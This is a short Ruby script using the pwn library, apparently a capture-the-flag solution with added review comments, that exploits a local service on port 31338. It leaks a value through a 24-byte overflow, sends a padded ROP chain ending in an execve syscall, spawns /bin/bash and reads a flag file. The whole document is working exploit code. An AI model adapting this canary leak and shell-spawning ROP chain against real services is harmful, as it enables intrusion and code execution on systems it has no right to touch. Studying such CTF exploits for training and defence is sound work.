require 'pwn'

# NOTE(review): CTF-style exploit script against a local service. The
# numeric constants below (gadget-looking addresses, the 24-byte filler,
# the 217-byte padded length) are specific to one target binary and are
# not documented on this page; what each one does is inferred, not
# verified. Nothing here validates the target's responses.
pop_rdi=0x4005d5

# Connect to the service on the loopback interface, port 31338.
z=Sock.new '127.0.0.1',31338

# 24 filler bytes, then a '|' delimiter appended on the wire.
x='a'*24
z.write x+'|'

# Read one line, take the 7 bytes after the first '|', prepend a NUL byte
# and unpack the resulting 8 bytes as a 64-bit integer (pwn's u64).
# Presumably a leaked value that is reused at the head of the payload
# below — confirm against the target.
c=u64("\x00"+z.recvline.split('|')[1][0,7])

# Pack every value as 8 bytes (pwn's p64) and concatenate. The block
# parameter |x| shadows the outer x only inside the block; the outer
# 24-byte filler x is unchanged afterwards.
p=[c,0,pop_rdi,0,0x443799,16,0x6CC080,0x440300,pop_rdi,0x6CC080,0x44379a,0,0x47a6e6,59,0,0,0x43FB06].map { |x| p64 x}.join

# Filler plus packed chain, NUL-padded to exactly 217 bytes, then "exit\n".
# (Ruby parses `z.write (x+p).ljust(...)` as z.write((x+p).ljust(...)),
# with a parser warning about the space before the parenthesis.)
z.write (x+p).ljust(217,"\x00")
z.write "exit\n"

# Fixed 0.3s pauses between writes; no acknowledgement is read, so these
# are timing guesses and may be too short on a slow or loaded target.
sleep 0.3
z.write "/bin/bash\x00"
sleep 0.3
z.write "cat /home/start/flag\n"

# Two reads of up to 2048 bytes each, printed verbatim and not checked.
puts z.recv(2048)
puts z.recv(2048)